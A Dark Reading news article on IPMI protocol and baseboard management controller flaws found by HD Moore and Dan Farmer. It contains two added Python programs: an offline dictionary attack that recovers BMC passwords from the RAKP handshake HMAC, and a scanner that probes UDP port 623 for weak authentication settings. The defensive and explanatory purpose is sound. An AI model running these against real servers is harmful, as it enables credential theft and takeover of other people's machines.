Dark Reading is part of the Informa Tech Division of Informa PLC

New Gaping Security Holes Found Exposing Servers

Researcher HD Moore so far has discovered around 300,000 servers online at serious risk of hacker takeover

A widely deployed protocol and controller used in servers and workstations both contain serious vulnerabilities that, in effect, give attackers near-physical access to the machines, a pair of renowned researchers said today.

HD Moore, chief research officer at Rapid7 and creator of Metasploit, and security researcher Dan Farmer announced findings of their research on major flaws in the Intelligent Platform Management Interface (IPMI) protocol and the Baseboard Management Controllers (BMC) packaged with most servers for remote management purposes.

As part of his ongoing Internet scanning research, Moore found more than 100,000 servers and workstations online that are vulnerable to one or more of six flaws in IPMI and BMC implementations, some of them bugs Farmer revealed earlier this year. Moore says this is just the tip of the iceberg of servers at risk on the Net. The bugs could allow an attacker to compromise the BMCs in affected servers and then siphon data from attached storage, modify the operating system, install a persistent backdoor, sniff credentials passing through the server, launch a denial-of-service attack, or wipe the hard drives.


Moore says these findings are big and more serious than other equipment he has found exposed on the Internet. "It's one thing to be hacking some crappy home router, but it's another thing" to see servers wide open to attack, he says.

And there isn't really a fix for the IPMI protocol problems. "By definition, the technology is pretty much broken. There's no such thing as an IPMI secure device," Moore says.

The vulnerabilities follow a theme common to other weaknesses Moore has found in Internet-facing equipment: backdoor-style access left in place by vendors for their own convenience, including default passwords, and customers who are either unaware that these interfaces exist or do not grasp the danger of leaving them exposed to the Internet.

"This definitely qualifies for the moniker 'gaping security hole,'" says Chris Wysopal, CTO at Veracode. "These management interfaces give, as Dan [Farmer] says, 'equivalent to physical access' and use a separate authentication scheme than IT admins typically use with centralized authentication, such as Windows Active Directory. Many admins don't know this management interface exists."

Those server ports should not be open to the outside, either, Wysopal says, so it appears to be a very prevalent mistake by server admins. "The big deal I see is that once an attacker is through the perimeter, they can have a field day internally with these vulnerabilities."

BMCs are found on most servers today and are OEMed and sold by Dell, HP, IBM, and Supermicro, for instance; they are either integrated on the server's motherboard or supplied as an add-on that plugs into a connector or PCI slot. They are essentially computers in their own right that provide remote management of the host: virtual keyboard, video, and mouse (KVM), power control, and virtual removable media. Even when the server is powered down, the BMC remains powered on.

IPMI, the server management protocol that runs on the BMC, is supported by some 200 vendors and was found by Farmer to have various authentication and access flaws.

The researchers say attackers could hack into a server via a compromised BMC by rebooting the server from a virtual CD-ROM and using a rescue disk. "The former resets the local Windows Administrator account password and the latter does an in-memory patch that disables console authentication in both Linux and Windows. The BMC can then force the server to boot normally and provide console access to the attacker through built-in KVM functionality," they wrote in an FAQ on the vulnerabilities.

"The BMC provides the equivalent of physical access to the server with many of the security exposures that this implies, such as booting to single-user mode, accessing the BIOS settings, and being able to watch the physical display. If the hard drives of the server are not encrypted, an attacker could boot the server into a rescue environment, and manipulate or copy the file system without any assistance from the server's operating system," they wrote.

Farmer's initial work on the bugs didn't capture much public attention. "It kind of sat there for five months, and the security community ignored it," he says. "It wasn't until we got some Internet exposure to how bad it really was" that it got the attention it deserved, according to Moore.

The researchers found a total of six flaws in BMC security, most of them rooted in the IPMI protocol itself:

• IPMI version 2.0's "cipher suite 0" option specifies no authentication algorithm, so a client that knows a valid username can log in with any password, bypassing authentication for IPMI commands. This option is frequently enabled by default in BMCs;

• IPMI version 2.0's RAKP authentication sends the requesting client an HMAC keyed with the user's password (in RAKP message 2) before the client has authenticated, which lets an attacker brute-force the password offline if it is not a strong one;

• IPMI version 2.0 supports logins by anonymous users, with the username and password both set to null. This account often carries administrative privileges, and some BMC vendors ship it enabled by default;

• All versions of IPMI answer an unauthenticated "Get Channel Authentication Capabilities" request, disclosing to any remote requester which authentication methods and user modes (such as null-username or anonymous login) the BMC accepts;

• Some BMCs enable the Universal Plug and Play (UPnP) protocol by default and offer no option to disable it. Supermicro's BMC is among them;

• IPMI passwords are stored in cleartext on the BMC (the RAKP exchange requires the BMC to hold the password itself, since the password is the HMAC key). This is especially dangerous because many servers often share the same IPMI password, so one compromised BMC exposes the rest. Both Dell and Supermicro BMCs store IPMI passwords this way.
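To make the second flaw concrete, here is an added example (not code from the article or from Moore and Farmer) of the offline attack it enables. The IPMI 2.0 specification defines the RAKP message 2 authentication code as HMAC(K_uid, SIDm || SIDc || Rm || Rc || GUIDc || RoleM || ULen || UName) with K_uid being the user's password, and the BMC sends it before the remote console has proved anything. Every value below (session IDs, nonces, GUID, the weak password and the wordlist) is constructed for the demonstration; nothing is sent to a BMC.

```python
"""Offline dictionary attack on the IPMI 2.0 RAKP message 2 HMAC.

Added example; not code from the article or from the researchers. All session
values, the password and the wordlist are constructed for the demo.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def rakp2_hmac(password: bytes, sid_m: int, sid_c: int, rand_m: bytes,
               rand_c: bytes, guid_c: bytes, role_m: int, username: bytes) -> bytes:
    """Key Exchange Authentication Code from RAKP message 2 (HMAC-SHA1, cipher suite 3).

    Session IDs are little-endian 32-bit; Rm/Rc are 16-byte nonces; GUIDc is the
    BMC's 16-byte GUID; RoleM is the privilege byte from RAKP message 1.
    The BMC keys the HMAC with the stored password (at most 20 bytes, zero-padded),
    which HMAC's own zero-padding of short keys makes equivalent to the raw password.
    """
    data = (struct.pack("<II", sid_m, sid_c) + rand_m + rand_c + guid_c
            + bytes([role_m & 0xFF, len(username)]) + username)
    return hmac.new(password, data, hashlib.sha1).digest()


def guess_password(observed: bytes, exchange: dict,
                   wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Recompute the HMAC per candidate and compare; the BMC is never contacted again."""
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_hmac(candidate, **exchange), observed):
            return candidate
    return None


# Constructed RAKP1/RAKP2 exchange, as a remote console would record it (sample values).
EXCHANGE = dict(
    sid_m=0xA0A1A2A3,            # console session ID
    sid_c=0x02000000,            # BMC session ID
    rand_m=bytes(range(16)),     # console nonce
    rand_c=bytes(range(16, 32)), # BMC nonce
    guid_c=b"\x11" * 16,         # BMC GUID
    role_m=0x14,                 # name-only lookup, Administrator privilege
    username=b"ADMIN",
)
SAMPLE_PASSWORD = b"password1"   # hypothetical weak password for the demo
OBSERVED_HMAC = rakp2_hmac(SAMPLE_PASSWORD, **EXCHANGE)  # stands in for bytes seen on the wire
SAMPLE_WORDLIST = [b"admin", b"changeme", b"root", b"password1", b"letmein"]


def demo() -> Optional[bytes]:
    """Run the offline guess against the constructed exchange."""
    return guess_password(OBSERVED_HMAC, EXCHANGE, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print("recovered:", demo())
```

The point of the exercise is that every candidate is checked locally at hash speed, with no lockout and no log entry on the BMC; only the initial session open is visible to the target.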

Rapid7 found 308,000 IPMI-enabled BMCs exposed on the Net, 195,000 of which offer no encryption because they run IPMI 1.5, which does not support it. Of the IPMI 2.0 systems, some 99,000 expose password hashes, 53,000 allow authentication bypass via cipher suite 0, and 35,000 run a vulnerable UPnP service.

Meanwhile, most server hosting providers that deploy Supermicro BMCs are affected by these flaws. The danger is that an attacker could install a persistent backdoor on the BMC and gain access to every one of the hosting provider's customers on that hardware platform, Moore says.

Rapid7, itself, had a brush with the BMC security holes earlier this year. The vulnerability management and penetration testing firm got a shipment of third-party appliances that included Supermicro motherboards that came with IPMI enabled. "The first round of Supermicro boards we received this year had IPMI enabled by default, and it took a couple long days and late nights to jumper them so we could use them as intended without introducing a risk," Moore recalls. "Our new boards specifically exclude the IPMI feature."

What To Do About It
Among the researchers' recommendations: scan for exposed systems to make sure IPMI-enabled BMCs are not reachable from the Internet. For servers running internally, disable cipher suite 0; set strong, complex passwords that are not shared across machines; and for Supermicro BMCs, update the firmware.
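The scanning step above, and the fourth flaw in the list (the unauthenticated "Get Channel Authentication Capabilities" request), can be demonstrated with one UDP datagram. The following is an added example, not code from the article or from the Rapid7/Metasploit scanner: it builds the credential-free probe the IPMI spec permits before any session exists, decodes the reply, and flags what the BMC advertises. The reply bytes used for the offline demonstration are constructed; only `probe()` touches the network.

```python
"""Probe for exposed IPMI BMCs with Get Channel Authentication Capabilities (UDP/623).

Added example; not the article's or the researchers' code. SAMPLE_REPLY is constructed.
"""
import socket
import struct

IPMI_UDP_PORT = 623
CMD_GET_CHANNEL_AUTH_CAPS = 0x38


def ipmi_checksum(span: bytes) -> int:
    """IPMI two's-complement checksum: the byte that makes the span sum to zero mod 256."""
    return (-sum(span)) & 0xFF


def build_get_channel_auth_caps(channel: int = 0x0E, privilege: int = 0x04) -> bytes:
    """Unauthenticated request: NetFn App (0x06), command 0x38.

    channel 0x0E = 'the channel this arrived on'; bit 7 asks for the IPMI 2.0
    extended data byte. privilege 0x04 = Administrator.
    """
    rmcp = bytes([0x06, 0x00, 0xFF, 0x07])   # version 6, reserved, seq 0xFF (no ACK), class IPMI
    hdr = bytes([0x20, 0x06 << 2])           # rsAddr = BMC (0x20), NetFn/LUN = App request
    body = bytes([0x81, 0x00, CMD_GET_CHANNEL_AUTH_CAPS, (channel & 0x0F) | 0x80, privilege])
    msg = hdr + bytes([ipmi_checksum(hdr)]) + body + bytes([ipmi_checksum(body)])
    # IPMI 1.5 session header: auth type NONE, session sequence 0, session ID 0, payload length
    session = bytes([0x00]) + struct.pack("<II", 0, 0) + bytes([len(msg)])
    return rmcp + session + msg


def parse_channel_auth_caps(reply: bytes) -> dict:
    """Decode the reply; RMCP (4) + session header (10) + IPMI header/cmd/completion (7)
    put the first data byte at offset 21."""
    if len(reply) < 30:
        raise ValueError("reply too short for a Get Channel Auth Capabilities response")
    if reply[0] != 0x06 or reply[3] != 0x07:
        raise ValueError("not an RMCP/IPMI datagram")
    cmd, completion = reply[19], reply[20]
    if cmd != CMD_GET_CHANNEL_AUTH_CAPS:
        raise ValueError(f"unexpected command 0x{cmd:02x}")
    if completion != 0x00:
        raise ValueError(f"BMC returned completion code 0x{completion:02x}")
    auth, user, conn = reply[22], reply[23], reply[24]
    return {
        "channel": reply[21] & 0x0F,
        "ipmi_1_5": bool(conn & 0x01),
        "ipmi_2_0": bool(conn & 0x02),
        "auth_none": bool(auth & 0x01),
        "auth_md2": bool(auth & 0x02),
        "auth_md5": bool(auth & 0x04),
        "auth_password": bool(auth & 0x10),
        "anonymous_login": bool(user & 0x01),
        "null_usernames": bool(user & 0x02),
        "non_null_usernames": bool(user & 0x04),
        "user_level_auth_disabled": bool(user & 0x08),
        "per_message_auth_disabled": bool(user & 0x10),
        "kg_set": bool(user & 0x20),
        "oem_id": int.from_bytes(reply[25:28], "little"),
    }


def assess(caps: dict) -> list:
    """Map the advertised capabilities onto the exposures the article describes."""
    findings = []
    if caps["ipmi_2_0"]:
        findings.append("IPMI 2.0: RAKP hands a password-keyed HMAC to any requester "
                        "(offline brute force); test cipher suite 0 separately")
    elif caps["ipmi_1_5"]:
        findings.append("IPMI 1.5 only: no session encryption available")
    if caps["anonymous_login"]:
        findings.append("anonymous login (null user, null password) enabled")
    if caps["null_usernames"]:
        findings.append("null-username accounts enabled")
    if caps["auth_none"]:
        findings.append("authentication type NONE accepted")
    if caps["user_level_auth_disabled"]:
        findings.append("user-level authentication disabled")
    return findings


def probe(host: str, timeout: float = 2.0) -> list:
    """Send one probe to host:623 and return the findings (needs network access)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_get_channel_auth_caps(), (host, IPMI_UDP_PORT))
        reply, _ = sock.recvfrom(1024)
    return assess(parse_channel_auth_caps(reply))


# Constructed reply from a hypothetical BMC: IPMI 1.5 and 2.0, MD5 and straight-password
# auth, null usernames enabled, per-message auth disabled, no anonymous login.
SAMPLE_REPLY = bytes.fromhex(
    "0600ff07"                         # RMCP header
    "00" "00000000" "00000000" "10"    # session: auth NONE, seq 0, id 0, length 16
    "811c63"                           # rqAddr, NetFn App response, header checksum
    "20003800"                         # rsAddr, rqSeq/LUN, cmd 0x38, completion OK
    "0e941603" "000000" "00"           # channel, auth types, user caps, ext caps, OEM ID, OEM aux
    "ed"                               # data checksum
)

if __name__ == "__main__":
    print("probe:", build_get_channel_auth_caps().hex())
    for finding in assess(parse_channel_auth_caps(SAMPLE_REPLY)):
        print("-", finding)
```

Note what this probe cannot tell you: whether cipher suite 0 is accepted. That requires an RMCP+ Open Session request naming authentication algorithm 0 and checking whether the BMC agrees, which is a separate test; this datagram only reveals what the BMC advertises. Anything on the Internet that answers it at all is already the exposure the article is about.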

Moore's full posting on the IPMI/BMC server security issues, including links to Farmer's research, is available here.

Kelly Jackson Higgins is Executive Editor at DarkReading.com.